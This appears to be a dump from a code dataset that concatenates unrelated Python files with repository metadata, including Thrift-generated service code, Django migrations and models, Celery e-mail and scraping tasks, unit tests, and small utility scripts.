            x.read(iprot)
            iprot.readMessageEnd()
            raise x
        result = uploadFile_result()
        result.read(iprot)
        iprot.readMessageEnd()
        if result.success is not None:
            return result.success
        # A void-less call with no success value indicates a protocol error.
        raise TApplicationException(TApplicationException.MISSING_RESULT, "uploadFile failed: unknown result")
class Processor(Iface, TProcessor):
    # Generated server-side dispatcher: maps incoming method names to the
    # wrapped handler's methods.
    def __init__(self, handler):
        self._handler = handler
        self._processMap = {}
        self._processMap["uploadFile"] = Processor.process_uploadFile
    def process(self, iprot, oprot):
        # Read one message; unknown method names are skipped and answered
        # with an UNKNOWN_METHOD application exception.
        (name, type, seqid) = iprot.readMessageBegin()
        if name not in self._processMap:
            iprot.skip(TType.STRUCT)
            iprot.readMessageEnd()
            x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
            oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
            x.write(oprot)
            oprot.writeMessageEnd()
            oprot.trans.flush()
            return
        else:
            self._processMap[name](self, seqid, iprot, oprot)
        return True
    def process_uploadFile(self, seqid, iprot, oprot):
        # Decode arguments, invoke the handler, and encode either the result
        # or an application exception back to the client.
        args = uploadFile_args()
        args.read(iprot)
        iprot.readMessageEnd()
        result = uploadFile_result()
        try:
            result.success = self._handler.uploadFile(args.filedata)
            msg_type = TMessageType.REPLY
        except TTransport.TTransportException:
            # Transport failures propagate; the connection is unusable.
            raise
        except TApplicationException as ex:
            logging.exception('TApplication exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = ex
        except Exception:
            # Any other handler error is reported as a generic internal error
            # (details stay in the server log, not on the wire).
            logging.exception('Unexpected exception in handler')
            msg_type = TMessageType.EXCEPTION
            result = TApplicationException(TApplicationException.INTERNAL_ERROR, 'Internal error')
        oprot.writeMessageBegin("uploadFile", msg_type, seqid)
        result.write(oprot)
        oprot.writeMessageEnd()
        oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class uploadFile_args(object):
    """
    Generated argument struct for uploadFile (Thrift wire format).

    Attributes:
    - filedata
    """
    def __init__(self, filedata=None,):
        self.filedata = filedata
    def read(self, iprot):
        # Fast path: C-accelerated decoder when available and a spec exists.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        # Slow path: field-by-field decode, skipping unknown fields for
        # forward compatibility.
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 1:
                if ftype == TType.STRUCT:
                    self.filedata = File()
                    self.filedata.read(iprot)
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()
    def write(self, oprot):
        # Fast path: C-accelerated encoder when available.
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('uploadFile_args')
        if self.filedata is not None:
            oprot.writeFieldBegin('filedata', TType.STRUCT, 1)
            self.filedata.write(oprot)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def validate(self):
        return
    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not (self == other)
# Register the struct and attach its wire spec (field id 1: File struct).
all_structs.append(uploadFile_args)
uploadFile_args.thrift_spec = (
    None,  # 0
    (1, TType.STRUCT, 'filedata', [File, None], None, ),  # 1
)
class uploadFile_result(object):
    """
    Generated result struct for uploadFile (Thrift wire format).

    Attributes:
    - success
    """
    def __init__(self, success=None,):
        self.success = success
    def read(self, iprot):
        # Fast path: C-accelerated decoder when available and a spec exists.
        if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
            iprot._fast_decode(self, iprot, [self.__class__, self.thrift_spec])
            return
        # Slow path: field-by-field decode; field id 0 carries the return
        # value by Thrift convention.
        iprot.readStructBegin()
        while True:
            (fname, ftype, fid) = iprot.readFieldBegin()
            if ftype == TType.STOP:
                break
            if fid == 0:
                if ftype == TType.BOOL:
                    self.success = iprot.readBool()
                else:
                    iprot.skip(ftype)
            else:
                iprot.skip(ftype)
            iprot.readFieldEnd()
        iprot.readStructEnd()
    def write(self, oprot):
        if oprot._fast_encode is not None and self.thrift_spec is not None:
            oprot.trans.write(oprot._fast_encode(self, [self.__class__, self.thrift_spec]))
            return
        oprot.writeStructBegin('uploadFile_result')
        if self.success is not None:
            oprot.writeFieldBegin('success', TType.BOOL, 0)
            oprot.writeBool(self.success)
            oprot.writeFieldEnd()
        oprot.writeFieldStop()
        oprot.writeStructEnd()
    def validate(self):
        return
    def __repr__(self):
        L = ['%s=%r' % (key, value)
             for key, value in self.__dict__.items()]
        return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
    def __ne__(self, other):
        return not (self == other)
# Register the struct and attach its wire spec (field id 0: bool result).
all_structs.append(uploadFile_result)
uploadFile_result.thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ),  # 0
)
# Resolve any recursive references in the registered specs, then drop the
# registry (it is only needed at import time).
fix_spec(all_structs)
del all_structs
| [
"[email protected]"
]
| |
5cb291f086a1a6e113110c2af91826068dd57189 | 255e19ddc1bcde0d3d4fe70e01cec9bb724979c9 | /all-gists/4287546/snippet.py | 9124f440cdeccffaef8a4bd8d92dd5e133c999f6 | [
"MIT"
]
| permissive | gistable/gistable | 26c1e909928ec463026811f69b61619b62f14721 | 665d39a2bd82543d5196555f0801ef8fd4a3ee48 | refs/heads/master | 2023-02-17T21:33:55.558398 | 2023-02-11T18:20:10 | 2023-02-11T18:20:10 | 119,861,038 | 76 | 19 | null | 2020-07-26T03:14:55 | 2018-02-01T16:19:24 | Python | UTF-8 | Python | false | false | 680 | py | # FROM: http://en.wikipedia.org/wiki/Base_36#Python_implementation
def base36encode(number):
    """Converts an integer into a base36 string.

    Digits are 0-9 followed by uppercase A-Z; negative numbers are
    prefixed with '-'. Raises TypeError for non-integer input.

    BUGFIX: the original tested ``isinstance(number, (int, long))``;
    ``long`` does not exist on Python 3, so *every* call raised NameError
    there. ``int`` covers all integer values on Python 3.
    """
    ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    if not isinstance(number, int):
        raise TypeError('This function must be called on an integer.')
    base36 = ''
    sign = ''
    if number < 0:
        sign = '-'
        number = -number
    # Single-digit fast path (also handles 0, which the loop below would
    # render as the empty string).
    if 0 <= number < len(ALPHABET):
        return sign + ALPHABET[number]
    # Peel off base-36 digits least-significant first, prepending each.
    while number != 0:
        number, i = divmod(number, len(ALPHABET))
        base36 = ALPHABET[i] + base36
    return sign + base36
def base36decode(number):
    """Decode a base36 string (digits 0-9, letters a-z/A-Z) to an int."""
    # int() natively parses arbitrary bases up to 36, including a sign.
    return int(number, 36)
"[email protected]"
]
| |
666459957700b84b14bec98f21fbd9d2c6441c2b | 7236d1d4873faa9735fd5e2d4598b211a370f731 | /project/n/projects/projects/ecommapp/ecommerce/migrations/0020_auto_20200928_1630.py | 7ceab26f28c88cea212b50ab80571813c500c591 | []
| no_license | Dreambigxz/my_first_django_app | 05f5a5d330d72084489f9306fca9ca232af13999 | 9e21ebcbe63c7394280558d2977ef8a796960e0d | refs/heads/main | 2023-01-03T18:45:20.712074 | 2020-10-23T09:05:47 | 2020-10-23T09:05:47 | 306,180,592 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | # Generated by Django 3.0.8 on 2020-09-28 15:30
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated Django migration: restricts Products.color to a fixed
    # set of choices (stored as two-letter codes) with 'RD' (Red) default.
    dependencies = [
        ('ecommerce', '0019_products_color'),
    ]
    operations = [
        migrations.AlterField(
            model_name='products',
            name='color',
            field=models.CharField(choices=[('YL', 'Yellow'), ('RD', 'Red'), ('OR', 'Orange'), ('GR', 'Green')], default='RD', max_length=200),
        ),
    ]
| [
"[email protected]"
]
| |
0209945db389ffcf041bf8356b57309837cca01c | bc233c24523f05708dd1e091dca817f9095e6bb5 | /bitmovin_api_sdk/models/profile_h262.py | b8e281c4665dfd372553426648bec8a362d66ae8 | [
"MIT"
]
| permissive | bitmovin/bitmovin-api-sdk-python | e3d6cf8eb8bdad62cb83ec77c0fc4950b06b9cdd | b0860c0b1be7747cf22ad060985504da625255eb | refs/heads/main | 2023-09-01T15:41:03.628720 | 2023-08-30T10:52:13 | 2023-08-30T10:52:13 | 175,209,828 | 13 | 14 | MIT | 2021-04-29T12:30:31 | 2019-03-12T12:47:18 | Python | UTF-8 | Python | false | false | 194 | py | # coding: utf-8
from enum import Enum
from six import string_types, iteritems
from bitmovin_api_sdk.common.poscheck import poscheck_model
class ProfileH262(Enum):
    # Only the 4:2:2 profile of H.262 (MPEG-2) is exposed by this API.
    MPEG2_422 = "MPEG2_422"
| [
"[email protected]"
]
| |
27e87424929b5c8237e98b92155346589f22cff5 | f00ad57c98e554470a72511dda7a7bfd160aca19 | /others/test_compress_str.py | 21fe737a9d075590a8f39e8909d0acdd69b93853 | []
| no_license | fanzhangg/algorithm-problems | d60115210aaaffcd094b34b9db5b46dadf93fe9e | 43b111ad625f197ba0905abceab9ee4484284e08 | refs/heads/master | 2021-07-12T20:24:46.265700 | 2020-07-06T17:58:31 | 2020-07-06T17:58:31 | 171,220,135 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 211 | py | from unittest import TestCase
from compress_string import compress_str
class TestCompressStr(TestCase):
    # Run-length encoding: each character is followed by its repeat count,
    # and counts of 1 are written explicitly ("B" -> "B1").
    def test_compress_str(self):
        self.assertEqual(compress_str("AAAAaaBCCCDDe"), "A4a2B1C3D2e1")
| [
"[email protected]"
]
| |
497ff7a37a21b8d7b26e76ad4a2070a35baf71cc | bb87afa0fd2f5466f282ba93779293449ae72e9f | /apps/article/tasks.py | 0377213159cd91d4dfd25488e3ce850c0d8f288e | [
"MIT"
]
| permissive | xuechuance/website | 14d50e6c66f4315f5829f5a2707fc7bdf3925266 | 91a017ea26806136a89f12d8620a4d99676a7497 | refs/heads/master | 2020-05-27T06:18:36.403271 | 2019-05-21T04:28:02 | 2019-05-21T04:28:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,889 | py | from __future__ import absolute_import
import datetime
from configparser import ConfigParser
from time import sleep
import requests
from celery import shared_task
from django.core.mail import send_mail
from random import Random
import random
from apps.article.models import Headlines
from apps.user.models import VerifyCode
from website import settings
from website.celery import app
def random_str(randomlength=8):
    """Return a random alphanumeric string of *randomlength* characters.

    Used below to generate e-mail verification codes.

    Fixes over the original: the accumulator shadowed the builtin ``str``,
    the length variable was misspelled (``lenght``) and used in manual
    ``randint`` index arithmetic, and the string was built with quadratic
    ``+=`` concatenation. ``random.choice`` + ``join`` is equivalent and
    idiomatic.
    """
    chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    result = "".join(random.choice(chars) for _ in range(randomlength))
    # Preserved from the original: the generated code is echoed to stdout.
    print(result)
    return result
@app.task()
def send_register_email(email,username=None,token=None,send_type='register'):
    """
    Celery task: send account-related e-mails.

    :param email: recipient address
    :param username: display name used in the registration mail body
    :param token: activation token embedded in the registration link
    :param send_type: 'register' (activation link), 'forget' (password
        reset code) or 'update_email' (e-mail change code)
    """
    # Four-digit verification code; only used by the non-register branches.
    code = random_str(4)
    email_title = ''
    email_body = ''
    if send_type =='register':
        # Registration: no VerifyCode record; the activation link embeds
        # the token directly.
        email_title = '注册用户验证信息'
        email_body = "\n".join([u'{0},欢迎加入我的博客'.format(username), u'请访问该链接,完成用户验证,该链接1个小时内有效',
                                '/'.join([settings.DOMAIN, 'activate', token])])
        print('========发送邮件中')
        # NOTE(review): 'send_stutas' is a typo for 'send_status' (kept as-is).
        send_stutas = send_mail(email_title,email_body,settings.EMAIL_HOST_USER,[email])
        if send_stutas:
            print('========发送成功')
            pass
    elif send_type == 'forget':
        # Password reset: persist the code so it can be checked later.
        VerifyCode.objects.create(code=code, email=email, send_type=send_type)
        email_title = '密码重置链接'
        email_body = "你的密码重置验证码为:{0}。如非本人操作请忽略,此验证码30分钟后失效。".format(code)
        print('========发送邮件中')
        send_stutas = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
        if send_stutas:
            print('========发送成功')
            pass
    elif send_type =='update_email':
        # E-mail change: same pattern as password reset.
        VerifyCode.objects.create(code=code, email=email, send_type=send_type)
        email_title = '修改邮箱链接'
        email_body = "你的修改邮箱验证码为:{0}。如非本人操作请忽略,此验证码30分钟后失效。".format(code)
        print('========发送邮件中')
        send_stutas = send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
        if send_stutas:
            print('========发送成功')
            pass
@app.task()
def error_email(email,title=None,body=None):
    # Celery task: notify an administrator by e-mail (used by getApi below
    # to report scraping failures).
    email_title = title
    email_body = body
    send_mail(email_title, email_body, settings.EMAIL_HOST_USER, [email])
@app.task()
def add():
    # Demo/smoke-test task: prints, sleeps five seconds, prints again.
    print('发送邮件到**************************************************************' )
    sleep(5)  # 休息5秒 (pause 5 seconds)
    print('success')
    return True
# Module-level configuration (API keys etc.) loaded once at import time;
# read by the scraping tasks below.
conf = ConfigParser()
conf.read('config.ini')
@app.task()
def getApi():
    """Periodic Celery task: fetch tech headlines from the juhe.cn API and
    bulk-insert them as Headlines rows. On failure, e-mail the admin via
    the error_email task."""
    print('正在获取数据...')
    #url = 'http://api01.idataapi.cn:8000/article/idataapi?KwPosition=3&catLabel1=科技&apikey={0}'.format(conf.get('iDataApi','key'))
    url = 'http://v.juhe.cn/toutiao/index?type=keji&key={0}'.format(conf.get('AppKey','key'))
    headers = {
        "Accept-Encoding": "gzip",
        "Connection": "close"
    }
    try:
        r = requests.get(url, headers=headers)
        if r.status_code == requests.codes.ok:
            dict_json = r.json()
            list_dict = []
            # Build unsaved model instances, then insert them in one query.
            for item in dict_json['result']['data']:
                # obj = Headlines(
                #     url=item['url'],
                #     title=item['title'],
                #     category=item['catLabel1'],
                #     conent=item['content'],
                #     author_name=item['sourceType'],
                # )
                # NOTE(review): 'conent' mirrors a (misspelled) model field;
                # it is filled with the title, not the article body.
                obj = Headlines(
                    url=item['url'],
                    title=item['title'],
                    category=item['category'],
                    conent=item['title'],
                    author_name=item['author_name'],
                )
                list_dict.append(obj)
            Headlines.objects.bulk_create(list_dict)
            print('数据添加成功')
    except Exception as e:
        # Best-effort: report the failure to the admin asynchronously.
        print('数据添加失败===正在发生邮件通知管理员',e)
        error_email.delay('[email protected]','抓取数据错误','{0}'.format(e))
        print('邮件发送成功')
print('邮件发送成功')
@app.task()
def removeApi():
# 当前日期格式
cur_date = datetime.datetime.now().date()
# 前一天日期
yester_day = cur_date - datetime.timedelta(days=1)
# 前一周日期
day = cur_date - datetime.timedelta(days=7)
print("=======正在删除7天前数据======")
# 查询前一周数据,也可以用range,我用的是glt,lte大于等于
Headlines.objects.filter(add_time__lte=day).delete()
print('======已删除=========')
| [
"[email protected]"
]
| |
21ee44b6155df6c86db7afac320d841dd0a6eea7 | 1d928c3f90d4a0a9a3919a804597aa0a4aab19a3 | /python/zulip/2016/4/realm_filters.py | 3ebd74a423ccd5d544621ba6011b7915cf5d5e90 | []
| no_license | rosoareslv/SED99 | d8b2ff5811e7f0ffc59be066a5a0349a92cbb845 | a062c118f12b93172e31e8ca115ce3f871b64461 | refs/heads/main | 2023-02-22T21:59:02.703005 | 2021-01-28T19:40:51 | 2021-01-28T19:40:51 | 306,497,459 | 1 | 1 | null | 2020-11-24T20:56:18 | 2020-10-23T01:18:07 | null | UTF-8 | Python | false | false | 2,844 | py | from __future__ import absolute_import
from __future__ import print_function
from optparse import make_option
from django.core.management.base import BaseCommand
from zerver.models import RealmFilter, all_realm_filters, get_realm
from zerver.lib.actions import do_add_realm_filter, do_remove_realm_filter
import sys
class Command(BaseCommand):
    # Django management command to add/remove/list realm link filters
    # (regex -> URL rewrites applied to messages).
    help = """Create a link filter rule for the specified domain.
NOTE: Regexes must be simple enough that they can be easily translated to JavaScript
RegExp syntax. In addition to JS-compatible syntax, the following features are available:
* Named groups will be converted to numbered groups automatically
* Inline-regex flags will be stripped, and where possible translated to RegExp-wide flags
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=add '#(?P<id>[0-9]{2,8})' 'https://trac.humbughq.com/ticket/%(id)s'
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=remove '#(?P<id>[0-9]{2,8})'
Example: python2.7 manage.py realm_filters --realm=zulip.com --op=show
"""
    def add_arguments(self, parser):
        # --realm is required; --op defaults to the read-only 'show'.
        parser.add_argument('-r', '--realm',
                            dest='domain',
                            type=str,
                            required=True,
                            help='The name of the realm to adjust filters for.')
        parser.add_argument('--op',
                            dest='op',
                            type=str,
                            default="show",
                            help='What operation to do (add, show, remove).')
        # Positional arguments are optional here; their presence is
        # validated per-operation in handle() below.
        parser.add_argument('pattern', metavar='<pattern>', type=str, nargs='?', default=None,
                            help="regular expression to match")
        parser.add_argument('url_format_string', metavar='<url pattern>', type=str, nargs='?',
                            help="format string to substitute")
    def handle(self, *args, **options):
        realm = get_realm(options["domain"])
        if options["op"] == "show":
            print("%s: %s" % (realm.domain, all_realm_filters().get(realm.domain, [])))
            sys.exit(0)
        # Both add and remove need a pattern.
        pattern = options['pattern']
        if not pattern:
            self.print_help("python2.7 manage.py", "realm_filters")
            sys.exit(1)
        if options["op"] == "add":
            # add additionally needs the URL format string.
            url_format_string = options['url_format_string']
            if not url_format_string:
                self.print_help("python2.7 manage.py", "realm_filters")
                sys.exit(1)
            do_add_realm_filter(realm, pattern, url_format_string)
            sys.exit(0)
        elif options["op"] == "remove":
            do_remove_realm_filter(realm, pattern)
            sys.exit(0)
        else:
            # Unknown operation: show usage and fail.
            self.print_help("python2.7 manage.py", "realm_filters")
            sys.exit(1)
| [
"[email protected]"
]
| |
0bed982517ec2d1db37c3a013aeab72f14937675 | e832ec980dfb5cb52fb3116ca1ac79052cb02fae | /guo_py1811code/first/day_0325/code/requests_07_https.py | d38a5e8c6e7d7af4f5e858619f1ace95123202f2 | []
| no_license | Liu-Zhijuan-0313/Spider | e6b10ebd5f9b5c70803494e1b894ac4556dfc544 | bf04e9615e23350f7c0b9321ac3b7cbd4450dd3e | refs/heads/master | 2020-05-03T18:36:12.102519 | 2019-04-19T02:48:13 | 2019-04-19T02:48:13 | 178,766,396 | 0 | 0 | null | 2019-04-18T07:11:23 | 2019-04-01T01:50:37 | HTML | UTF-8 | Python | false | false | 106 | py | import requests
response = requests.get('https://kennethreitz.com', verify=True)
print(response.text)
| [
"[email protected]"
]
| |
94709ea9fdd3f5b965a753f366702dbec38c259a | c0c6b41523d8f8071c88d4320d9040a6d1d2e3f4 | /problem1 | 80d2761714d5ce30c6ac12310c7fc42a98b8b028 | []
| no_license | GLAU-TND/python-programming-assignment-2-Manish-021 | 952cf9bd8a4f953074595f7c7d164541eba94443 | 782bdef864fadac653e500d03498de6c92c56382 | refs/heads/master | 2021-01-09T11:43:22.749103 | 2020-02-24T11:42:25 | 2020-02-24T11:42:25 | 242,287,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | t=eval(input())
b=[min(t)]
a=min(t)[-1]
t.remove(min(t))
for i in t:
for j in t:
if a==j[0] and j[-1]!=b[0][0]:
b.append(j)
a=j[-1]
t.remove(j)
break
b=b+t
print(b)
| [
"[email protected]"
]
| ||
81008224cac8591b4f00dcd38bf9b8e5cc34dc27 | 30ec40dd6a81dbee73e7f14c144e20495960e565 | /kubernetes/client/models/v1beta1_http_ingress_rule_value.py | 9653f80f26ca995284fb6ca79ec30368e71cd13e | [
"Apache-2.0"
]
| permissive | jonathan-kosgei/client-python | ae5a46968bcee19a3c62e1cefe227131ac9e7200 | 4729e6865d810824cafa312b4d06dfdb2d4cdb54 | refs/heads/master | 2021-01-20T14:59:10.435626 | 2017-05-08T16:55:51 | 2017-05-08T16:55:51 | 90,700,132 | 1 | 0 | null | 2017-05-09T03:50:42 | 2017-05-09T03:50:42 | null | UTF-8 | Python | false | false | 3,300 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.6.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1HTTPIngressRuleValue(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, paths=None):
"""
V1beta1HTTPIngressRuleValue - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'paths': 'list[V1beta1HTTPIngressPath]'
}
self.attribute_map = {
'paths': 'paths'
}
self._paths = paths
@property
def paths(self):
"""
Gets the paths of this V1beta1HTTPIngressRuleValue.
A collection of paths that map requests to backends.
:return: The paths of this V1beta1HTTPIngressRuleValue.
:rtype: list[V1beta1HTTPIngressPath]
"""
return self._paths
@paths.setter
def paths(self, paths):
"""
Sets the paths of this V1beta1HTTPIngressRuleValue.
A collection of paths that map requests to backends.
:param paths: The paths of this V1beta1HTTPIngressRuleValue.
:type: list[V1beta1HTTPIngressPath]
"""
if paths is None:
raise ValueError("Invalid value for `paths`, must not be `None`")
self._paths = paths
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1HTTPIngressRuleValue):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
]
| |
a098dbcf2862c4b934dc7a374423ead058106d1c | 1e84a9fec36deaf9a55a2734749ea035f72ac869 | /KAKAO BLIND RECRUITMENT/2017/1차/다트 게임/refernece_code.py | f0d49073d4794a7333d54379d6f483324e86a55c | []
| no_license | mgh3326/programmers_algorithm | aa3afc91231550e1fec2d72d90e85b140f79d677 | b62f08ccccbdcac71e484d508985a5a9ce5f2434 | refs/heads/master | 2022-08-31T04:19:15.728666 | 2022-07-31T14:02:26 | 2022-07-31T14:02:26 | 201,747,526 | 0 | 0 | null | 2022-07-23T10:19:13 | 2019-08-11T10:02:15 | Python | UTF-8 | Python | false | false | 601 | py | def solution(dartResult):
point = []
answer = []
dartResult = dartResult.replace('10','k')
point = ['10' if i == 'k' else i for i in dartResult]
print(point)
i = -1
sdt = ['S', 'D', 'T']
for j in point:
if j in sdt :
answer[i] = answer[i] ** (sdt.index(j)+1)
elif j == '*':
answer[i] = answer[i] * 2
if i != 0 :
answer[i - 1] = answer[i - 1] * 2
elif j == '#':
answer[i] = answer[i] * (-1)
else:
answer.append(int(j))
i += 1
return sum(answer)
| [
"[email protected]"
]
| |
34c75ed85b11695edf53feaa3236244bd3fefc44 | ac5e52a3fc52dde58d208746cddabef2e378119e | /exps-sblp-obt/sblp_ut=3.5_rd=1_rw=0.06_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=4/params.py | f2962918ddc7d0f6fada37b1a1592dedf23cce8d | []
| no_license | ricardobtxr/experiment-scripts | 1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1 | 7bcebff7ac2f2822423f211f1162cd017a18babb | refs/heads/master | 2023-04-09T02:37:41.466794 | 2021-04-25T03:27:16 | 2021-04-25T03:27:16 | 358,926,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | {'cpus': 4,
'duration': 30,
'final_util': '3.668690',
'max_util': '3.5',
'periods': 'harmonic-2',
'release_master': False,
'res_distr': '1',
'res_nmb': '4',
'res_weight': '0.06',
'scheduler': 'RUN',
'trial': 4,
'utils': 'uni-medium-3'}
| [
"[email protected]"
]
| |
5fc066834916a8dbb349035d834ab8ffcd3415d5 | c3483984a4782be6097e4753de3cb545ae00039b | /geneticTest/unitTestingExample/unitTesting/test_Employee.py | e00ef30b7b7dd17f737f32a405b4966559a25522 | []
| no_license | nghiemphan93/machineLearning | 67c3f60f317a0c753b465751113511baaefd1184 | 36d214b27c68d399f5494b5ec9b28fee74d57f7f | refs/heads/master | 2020-03-28T02:20:11.843154 | 2020-02-03T14:18:39 | 2020-02-03T14:18:39 | 147,563,336 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,536 | py | import unittest
from geneticTest.unitTestingExample.stuffToTest.Employee import Employee
class TestEmployee(unittest.TestCase):
    """Unit tests for Employee: email, fullname and apply_raise."""

    @classmethod
    def setUpClass(cls):
        # Runs once before any test in this class.
        print('setupClass')

    @classmethod
    def tearDownClass(cls):
        # Runs once after all tests in this class have finished.
        print('teardownClass')

    def setUp(self):
        # Fresh fixtures before every test so the tests stay independent.
        print('setUp')
        self.emp_1 = Employee('Corey', 'Schafer', 50000)
        self.emp_2 = Employee('Sue', 'Smith', 60000)

    def tearDown(self):
        print('tearDown\n')

    def test_email(self):
        # email should be derived from the name and track name changes.
        print('test_email')
        self.assertEqual(self.emp_1.email, '[email protected]')
        self.assertEqual(self.emp_2.email, '[email protected]')
        self.emp_1.first = 'John'
        self.emp_2.first = 'Jane'
        self.assertEqual(self.emp_1.email, '[email protected]')
        self.assertEqual(self.emp_2.email, '[email protected]')

    def test_fullname(self):
        # fullname should be derived from the name and track name changes.
        print('test_fullname')
        self.assertEqual(self.emp_1.fullname, 'Corey Schafer')
        self.assertEqual(self.emp_2.fullname, 'Sue Smith')
        self.emp_1.first = 'John'
        self.emp_2.first = 'Jane'
        self.assertEqual(self.emp_1.fullname, 'John Schafer')
        self.assertEqual(self.emp_2.fullname, 'Jane Smith')

    def test_apply_raise(self):
        # apply_raise should multiply pay by the raise factor (5% here).
        print('test_apply_raise')
        self.emp_1.apply_raise()
        self.emp_2.apply_raise()
        self.assertEqual(self.emp_1.pay, 52500)
        self.assertEqual(self.emp_2.pay, 63000)
if __name__ == '__main__':
unittest.main() | [
"[email protected]"
]
| |
56e2ea0cf73544e8dbe4bf9a62cade699f0cd4f7 | 353e6685be6737a828b8770d4d71e389ca2853b9 | /0x11-python-network_1/5-hbtn_header.py | b7a195a4f570bbc400e36cfd7ab5c6a16a190e72 | []
| no_license | adebudev/holbertonschool-higher_level_programming | 912af3f7caab3197beb062b5389f5b464b2ed177 | cb0510ed0b6d7b7c43d0fd6949139b62e2bdede7 | refs/heads/master | 2022-12-18T17:40:28.539558 | 2020-09-25T04:29:45 | 2020-09-25T04:29:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | #!/usr/bin/python3
"""Request value X-Request-Id with requests Module"""
import requests
import sys
if __name__ == '__main__':
"""displays the value of the variable X-Request-Id"""
url = sys.argv[1]
R = 'X-Request-Id'
req = requests.get(url)
print(req.headers.get(R))
| [
"[email protected]"
]
| |
63d41c42f8f87f62095b5bc99fda6d77e3eb4288 | 59788643fcce655a3a15ad0d3c91401a63e525d9 | /home/models.py | f925cf6580cdcd1ae6f9a202aa595fe40ca9a4ba | []
| no_license | crowdbotics-apps/element-28308 | f39132662eb2e433d44e3c570ae539d9feae3db0 | 018966b7d47c9e2f9b1bb33c018d1a9b7a3b3b42 | refs/heads/master | 2023-06-06T09:31:10.513777 | 2021-06-29T20:33:03 | 2021-06-29T20:33:03 | 381,465,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 276 | py | from django.conf import settings
from django.db import models
class CustomText(models.Model):
"Generated Model"
chart = models.URLField(
null=True,
blank=True,
)
class HomePage(models.Model):
"Generated Model"
body = models.TextField()
| [
"[email protected]"
]
| |
b71cf501c6e9e920c344c180785088347c9eea05 | 398de9098811c7712b18f8e314340ce93aa86839 | /id2date.py | 7fc4502cd5258ae680b5604cba9dd53e78ba1f70 | []
| no_license | NiMaZi/thesis | 0c2ce8bced070d010838bae80f844a46bb1a798c | 15dc1aeca941f8feec4c283cd7436983ba982871 | refs/heads/master | 2020-03-18T13:19:52.711331 | 2018-07-09T12:11:08 | 2018-07-09T12:11:08 | 134,776,324 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,288 | py | import os
import sys
import csv
import json
import boto3
import numpy as np
homedir=os.environ['HOME']
from elasticsearch import Elasticsearch
from elasticsearch.helpers import scan
es=Elasticsearch(['localhost:9200'])
s3 = boto3.resource("s3")
mybucket=s3.Bucket("workspace.scitodate.com")
s3key=sys.argv[1]
id2date={}
for i in range(0,15000):
try:
mybucket.download_file("yalun/"+s3key+"/abs"+str(i)+".txt",homedir+"/temp/tmptxt"+s3key+".txt")
except:
continue
f=open(homedir+"/temp/tmptxt"+s3key+".txt",'r',encoding='utf-8')
abstract=f.read().split(",")[0]
f.close()
results=scan(es,
query={
"query": {
"bool": {
"must": [{"match_phrase": {"abstract": abstract}}]
}
}
},
size=1
)
for n,result in enumerate(results):
if n>10:
